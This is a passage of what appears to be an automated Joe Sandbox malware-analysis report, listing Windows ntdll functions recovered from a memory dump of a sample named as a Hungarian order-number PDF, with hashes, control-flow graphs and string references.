                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62c2eb27f2d8cf2f288f3370ac645aab1eb2106470833d6ed4ea1a734679077
                                              • Instruction ID: d44d6f84fbcdc609e3535b233202b8bb907c66ed49430dc4f493b797f9ca765b
                                              • Opcode Fuzzy Hash: c62c2eb27f2d8cf2f288f3370ac645aab1eb2106470833d6ed4ea1a734679077
                                              • Instruction Fuzzy Hash: E890022130548882D50075586808A06005547D0216F59E012A5065555DC6358955A531
                                              Function 335A2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5393dc64726930a406b64b0e1df03ef9437d948aa36aecd4be917359466a6378
                                              • Instruction ID: 3b872de79b87ea694143f6628e70685d94d982c3c0c17802a3581c6e090f5ba5
                                              • Opcode Fuzzy Hash: 5393dc64726930a406b64b0e1df03ef9437d948aa36aecd4be917359466a6378
                                              • Instruction Fuzzy Hash: 8790022130144443D54071586818606405597E1312F59E012E4415514CD915895A5622
                                              Function 335A2DD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c94de6b7e11429c6e87e2f852dec8ddb87106a43bac089ed15495ae25d32fe4
                                              • Instruction ID: 8d80e4e43b8e92521b7c86fa9015e77ea64b41626ecc2a298c90588db215cd41
                                              • Opcode Fuzzy Hash: 4c94de6b7e11429c6e87e2f852dec8ddb87106a43bac089ed15495ae25d32fe4
                                              • Instruction Fuzzy Hash: 5F900221342485929945B1585804507405657E0252799D013A5415910C8526995ADA21
                                              Function 335A2DB0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5aff29457f7afc90913b54793c1fb65768a917147c00a2822319d4e3dc00a935
                                              • Instruction ID: 20a35a2f23fa997f0c3e6ab5e0dfde065d6e4646392362169ce46b9c91a23cc7
                                              • Opcode Fuzzy Hash: 5aff29457f7afc90913b54793c1fb65768a917147c00a2822319d4e3dc00a935
                                              • Instruction Fuzzy Hash: 7190023134144842D54171585804606005957D0252F99D013A4425514E86558B5AAE61
                                              Function 335A2C60 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 775347eadeebf40bd649060c139e640112ea70885e11f64003f8e69dcfcc7afa
                                              • Instruction ID: 1a18fb383e24ff89a612717b4090ab1a9cee2e8a0a6d32add40eaf188239ba90
                                              • Opcode Fuzzy Hash: 775347eadeebf40bd649060c139e640112ea70885e11f64003f8e69dcfcc7afa
                                              • Instruction Fuzzy Hash: 3390023130144C82D50071585804B46005547E0312F59D017A4125614D8615C9557921
                                              Function 335A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc1dc62631bcef453f56cc2a5cec1a2d64f0c8988c1dea3947fa58624d32ce53
                                              • Instruction ID: 20acf89880525f5116f06b1138aeb1de41c51bbbeb04bd9acc197652ee4373cf
                                              • Opcode Fuzzy Hash: cc1dc62631bcef453f56cc2a5cec1a2d64f0c8988c1dea3947fa58624d32ce53
                                              • Instruction Fuzzy Hash: D290022170544842D54071586818706006547D0212F59E012A4025514DC6598B596AA1
                                              Function 335A2CF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c1f47581257488c96a9023dcacb22ea834d160b6c57c97f7f744d238206a39d
                                              • Instruction ID: 9205f4df6ac9d69d39edacd89b3b438ad3d3aa92d5f8e23b2193e246d145c5a0
                                              • Opcode Fuzzy Hash: 8c1f47581257488c96a9023dcacb22ea834d160b6c57c97f7f744d238206a39d
                                              • Instruction Fuzzy Hash: CC90023130144843D50071586908707005547D0212F59E412A4425518DD65689556521
                                              Function 335A2CA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 354a77796a3ad603637d2815b7c6099eac4b78190c118f42b7334744c2ba1800
                                              • Instruction ID: 943dadb25520ed72d69ff0d208dfbef15866f02b2cd91b0992af3948daf90e7d
                                              • Opcode Fuzzy Hash: 354a77796a3ad603637d2815b7c6099eac4b78190c118f42b7334744c2ba1800
                                              • Instruction Fuzzy Hash: C090023130144842D50075986808646005547E0312F59E012A9025515EC66589956531
                                              Function 335A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 5d4877371bd94d5b99d5786ec77c252acc63dd35b91ebcf72365b74d3961cedd
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Function 335A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1127 335a2890-335a28b3 1128 335da4bc-335da4c0 1127->1128 1129 335a28b9-335a28cc 1127->1129 1128->1129 1130 335da4c6-335da4ca 1128->1130 1131 335a28ce-335a28d7 1129->1131 1132 335a28dd-335a28df 1129->1132 1130->1129 1133 335da4d0-335da4d4 1130->1133 1131->1132 1134 335da57e-335da585 1131->1134 1135 335a28e1-335a28e5 1132->1135 1133->1129 1136 335da4da-335da4de 1133->1136 1134->1132 1137 335a28eb-335a28fa 1135->1137 1138 335a2988-335a298e 1135->1138 1136->1129 1142 335da4e4-335da4eb 1136->1142 1139 335da58a-335da58d 1137->1139 1140 335a2900-335a2905 1137->1140 1141 335a2908-335a290c 1138->1141 1139->1141 1140->1141 1141->1135 1143 335a290e-335a291b 1141->1143 1144 335da4ed-335da4f4 1142->1144 1145 335da564-335da56c 1142->1145 1146 335a2921 1143->1146 1147 335da592-335da599 1143->1147 1149 335da50b 1144->1149 1150 335da4f6-335da4fe 1144->1150 1145->1129 1148 335da572-335da576 1145->1148 1151 335a2924-335a2926 1146->1151 1159 335da5a1-335da5c9 call 335b0050 1147->1159 1148->1129 1152 335da57c call 335b0050 1148->1152 1154 335da510-335da536 call 335b0050 1149->1154 1150->1129 1153 335da504-335da509 1150->1153 1156 335a2928-335a292a 1151->1156 1157 335a2993-335a2995 1151->1157 1166 335da55d-335da55f 1152->1166 1153->1154 1154->1166 1163 335a292c-335a292e 1156->1163 1164 335a2946-335a2966 call 335b0050 1156->1164 1157->1156 1161 335a2997-335a29b1 call 335b0050 1157->1161 1176 335a2969-335a2974 1161->1176 1163->1164 1169 335a2930-335a2944 call 335b0050 1163->1169 1164->1176 1173 335a2981-335a2985 1166->1173 1169->1164 1176->1151 1178 335a2976-335a2979 1176->1178 1178->1159 1179 335a297f 1178->1179 1179->1173
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 91e20bf8aa023d0aebdcb56f6ab68489b523d640992387bf9a7b328f012d5e27
                                              • Instruction ID: f74d896f10762f993e31a0f6cfe9649f13669c705275a8005063d6902e478ee9
                                              • Opcode Fuzzy Hash: 91e20bf8aa023d0aebdcb56f6ab68489b523d640992387bf9a7b328f012d5e27
                                              • Instruction Fuzzy Hash: 7B5116B6A04316BFDB11CF9CE98097EF7B8BB48240B548669F4A4D3641D734DE509BE0
                                              Function 33612410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1180 33612410-33612433 1181 33612439-3361243d 1180->1181 1182 336124ec-336124ff 1180->1182 1181->1182 1183 33612443-33612447 1181->1183 1184 33612501-3361250a 1182->1184 1185 33612513-33612515 1182->1185 1183->1182 1186 3361244d-33612451 1183->1186 1184->1185 1187 3361250c 1184->1187 1188 33612517-3361251b 1185->1188 1186->1182 1189 33612457-3361245b 1186->1189 1187->1185 1190 33612538-3361253e 1188->1190 1191 3361251d-3361252c 1188->1191 1189->1182 1192 33612461-33612468 1189->1192 1195 33612543-33612547 1190->1195 1193 33612540 1191->1193 1194 3361252e-33612536 1191->1194 1197 336124b6-336124be 1192->1197 1198 3361246a-33612471 1192->1198 1193->1195 1194->1195 1195->1188 1196 33612549-33612556 1195->1196 1199 33612564 1196->1199 1200 33612558-33612562 1196->1200 1197->1182 1201 336124c0-336124c4 1197->1201 1202 33612473-3361247b 1198->1202 1203 33612484 1198->1203 1204 33612567-33612569 1199->1204 1200->1204 1201->1182 1205 336124c6-336124ea call 335b0510 1201->1205 1202->1182 1206 3361247d-33612482 1202->1206 1207 33612489-336124ab call 335b0510 1203->1207 1208 3361256b-3361256d 1204->1208 1209 3361258d-3361258f 1204->1209 1217 336124ae-336124b1 1205->1217 1206->1207 1207->1217 1208->1209 1212 3361256f-3361258b call 335b0510 1208->1212 1214 33612591-33612593 1209->1214 1215 336125ae-336125d0 call 335b0510 1209->1215 1225 336125d3-336125df 1212->1225 1214->1215 1219 33612595-336125ab call 335b0510 1214->1219 1215->1225 1221 33612615-33612619 1217->1221 1219->1215 1225->1204 1227 336125e1-336125e4 1225->1227 1228 33612613 1227->1228 1229 336125e6-33612610 call 335b0510 1227->1229 1228->1221 1229->1228
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 18b9397ffa0d406dc14beca0711b625f89f9c4f87b39c4624b260e939bf61033
                                              • Instruction ID: 296e51d2b4f8188ddcda3c1f18efa50715ac37120df2c95244109dfd03da7616
                                              • Opcode Fuzzy Hash: 18b9397ffa0d406dc14beca0711b625f89f9c4f87b39c4624b260e939bf61033
                                              • Instruction Fuzzy Hash: CC5125B5E00745AEEB20CF9CC98097FB7FDEB44240B44846AE4D7C3685EB74EA509B60
                                              Function 3363A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1429 3363a670-3363a6e9 call 33572410 * 2 RtlDebugPrintTimes 1435 3363a89f-3363a8c4 call 335725b0 * 2 call 335a4c30 1429->1435 1436 3363a6ef-3363a6fa 1429->1436 1438 3363a724 1436->1438 1439 3363a6fc-3363a709 1436->1439 1440 3363a728-3363a734 1438->1440 1442 3363a70b-3363a70d 1439->1442 1443 3363a70f-3363a715 1439->1443 1444 3363a741-3363a743 1440->1444 1442->1443 1446 3363a7f3-3363a7f5 1443->1446 1447 3363a71b-3363a722 1443->1447 1448 3363a736-3363a73c 1444->1448 1449 3363a745-3363a747 1444->1449 1450 3363a81f-3363a821 1446->1450 1447->1440 1452 3363a73e 1448->1452 1453 3363a74c-3363a750 1448->1453 1449->1450 1454 3363a827-3363a834 1450->1454 1455 3363a755-3363a77d RtlDebugPrintTimes 1450->1455 1452->1444 1458 3363a86c-3363a86e 1453->1458 1459 3363a836-3363a843 1454->1459 1460 3363a85a-3363a866 1454->1460 1455->1435 1467 3363a783-3363a7a0 RtlDebugPrintTimes 1455->1467 1458->1450 1463 3363a845-3363a849 1459->1463 1464 3363a84b-3363a851 1459->1464 1461 3363a87b-3363a87d 1460->1461 1465 3363a870-3363a876 1461->1465 1466 3363a87f-3363a881 1461->1466 1463->1464 1468 3363a857 1464->1468 1469 3363a96b-3363a96d 1464->1469 1471 3363a8c7-3363a8cb 1465->1471 1472 3363a878 1465->1472 1470 3363a883-3363a889 1466->1470 1467->1435 1477 3363a7a6-3363a7cc RtlDebugPrintTimes 1467->1477 1468->1460 1469->1470 1474 3363a8d0-3363a8f4 RtlDebugPrintTimes 1470->1474 1475 3363a88b-3363a89d RtlDebugPrintTimes 1470->1475 1473 3363a99f-3363a9a1 1471->1473 1472->1461 1474->1435 1480 3363a8f6-3363a913 RtlDebugPrintTimes 1474->1480 1475->1435 1477->1435 1482 3363a7d2-3363a7d4 1477->1482 1480->1435 1489 3363a915-3363a944 RtlDebugPrintTimes 1480->1489 1483 3363a7f7-3363a80a 1482->1483 1484 3363a7d6-3363a7e3 1482->1484 1488 3363a817-3363a819 1483->1488 1486 3363a7e5-3363a7e9 1484->1486 1487 3363a7eb-3363a7f1 1484->1487 1486->1487 1487->1446 1487->1483 1490 3363a81b-3363a81d 1488->1490 1491 3363a80c-3363a812 1488->1491 1489->1435 1495 3363a94a-3363a94c 1489->1495 1490->1450 1492 3363a814 1491->1492 1493 3363a868-3363a86a 1491->1493 1492->1488 1493->1458 1496 3363a972-3363a985 1495->1496 1497 3363a94e-3363a95b 1495->1497 1498 3363a992-3363a994 1496->1498 1499 3363a963-3363a969 1497->1499 1500 3363a95d-3363a961 1497->1500 1501 3363a987-3363a98d 1498->1501 1502 3363a996 1498->1502 1499->1469 1499->1496 1500->1499 1503 3363a99b-3363a99d 1501->1503 1504 3363a98f 1501->1504 1502->1466 1503->1473 1504->1498
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: 35c057acb83b781177725337d45f6bbc8bdae66d0612b7a2820c0860d00b5171
                                              • Instruction ID: fcb5ea2496d9a6e57a20b4b9cb252f58577bf35a301c1afe37a8207c04f30bfe
                                              • Opcode Fuzzy Hash: 35c057acb83b781177725337d45f6bbc8bdae66d0612b7a2820c0860d00b5171
                                              • Instruction Fuzzy Hash: D1A1AB75A153128FD704CE28C894A1ABBE5FF89360F19456DE945EB360EB30EC06DB92
                                              Function 33597630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1505 33597630-33597651 1506 3359768b-33597699 call 335a4c30 1505->1506 1507 33597653-3359766f call 3356e660 1505->1507 1512 335d4638 1507->1512 1513 33597675-33597682 1507->1513 1517 335d463f-335d4645 1512->1517 1514 3359769a-335976a9 call 33597818 1513->1514 1515 33597684 1513->1515 1521 335976ab-335976c1 call 335977cd 1514->1521 1522 33597701-3359770a 1514->1522 1515->1506 1519 335d464b-335d46b8 call 335ef290 call 335a9020 RtlDebugPrintTimes BaseQueryModuleData 1517->1519 1520 335976c7-335976d0 call 33597728 1517->1520 1519->1520 1537 335d46be-335d46c6 1519->1537 1520->1522 1533 335976d2 1520->1533 1521->1517 1521->1520 1525 335976d8-335976e1 1522->1525 1530 3359770c-3359770e 1525->1530 1531 335976e3-335976f2 call 3359771b 1525->1531 1536 335976f4-335976f6 1530->1536 1531->1536 1533->1525 1539 335976f8-335976fa 1536->1539 1540 33597710-33597719 1536->1540 1537->1520 1541 335d46cc-335d46d3 1537->1541 1539->1515 1542 335976fc 1539->1542 1540->1539 1541->1520 1543 335d46d9-335d46e4 1541->1543 1544 335d47be-335d47d0 call 335a2c50 1542->1544 1545 335d47b9 call 335a4d48 1543->1545 1546 335d46ea-335d4723 call 335ef290 call 335aaaa0 1543->1546 1544->1515 1545->1544 1554 335d473b-335d476b call 335ef290 1546->1554 1555 335d4725-335d4736 call 335ef290 1546->1555 1554->1520 1560 335d4771-335d477f call 335aa770 1554->1560 1555->1522 1563 335d4786-335d47a3 call 335ef290 call 335dcf9e 1560->1563 1564 335d4781-335d4783 1560->1564 1563->1520 1569 335d47a9-335d47b2 1563->1569 1564->1563 1569->1560 1570 335d47b4 1569->1570 1570->1520
                                              Strings
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 335D46FC
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 335D4742
                                              • Execute=1, xrefs: 335D4713
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 335D4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 335D4787
                                              • ExecuteOptions, xrefs: 335D46A0
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 335D4725
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: d7a686dc6aa039bca0860e05fc6df83818398b891fd7ef46c2c47372e0ccac93
                                              • Instruction ID: 8d56ce52a70e700a99d85eb4852cbaa56afeb3566c065a71383d3b2f8ac552c1
                                              • Opcode Fuzzy Hash: d7a686dc6aa039bca0860e05fc6df83818398b891fd7ef46c2c47372e0ccac93
                                              • Instruction Fuzzy Hash: 2F510975A003197AFB119BA8FC85BED77B8AF84340F8404EAE505AB181EB709A458F90
                                              Function 3357A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335C79D5
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 335C79D0, 335C79F5
                                              • Actx , xrefs: 335C7A0C, 335C7A73
                                              • SsHd, xrefs: 3357A3E4
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 335C7AE6
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335C79FA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              • Opcode ID: 5a1b9e0aa6ca03dc8539ef236ee3fbe0f4dc5639c318af95b87fc51bee29c166
                                              • Instruction ID: af7d8e4c2f93fce2806e7db415bfa5c14b43e4ea2eab217669a3dcc35aed7e75
                                              • Opcode Fuzzy Hash: 5a1b9e0aa6ca03dc8539ef236ee3fbe0f4dc5639c318af95b87fc51bee29c166
                                              • Instruction Fuzzy Hash: A1E1E5B5A043418FE715CE24E884B1AB7E5BF84398F584A2DF8A5CB790DB33D945CB81
                                              Function 335DFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              • Opcode ID: df4eec277c45635fe4db8e7edf34ec56226af1a10513eafba63784c9242c0abf
                                              • Instruction ID: 8153dc45265d99438b388f592a768165a321bfa7612f100e1b8a9b71e8c43430
                                              • Opcode Fuzzy Hash: df4eec277c45635fe4db8e7edf34ec56226af1a10513eafba63784c9242c0abf
                                              • Instruction Fuzzy Hash: 714169B9E01219AFDB01DF99E890ADEBBF5FF88754F140229E904EB341D7719911CBA0
                                              Function 3360FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
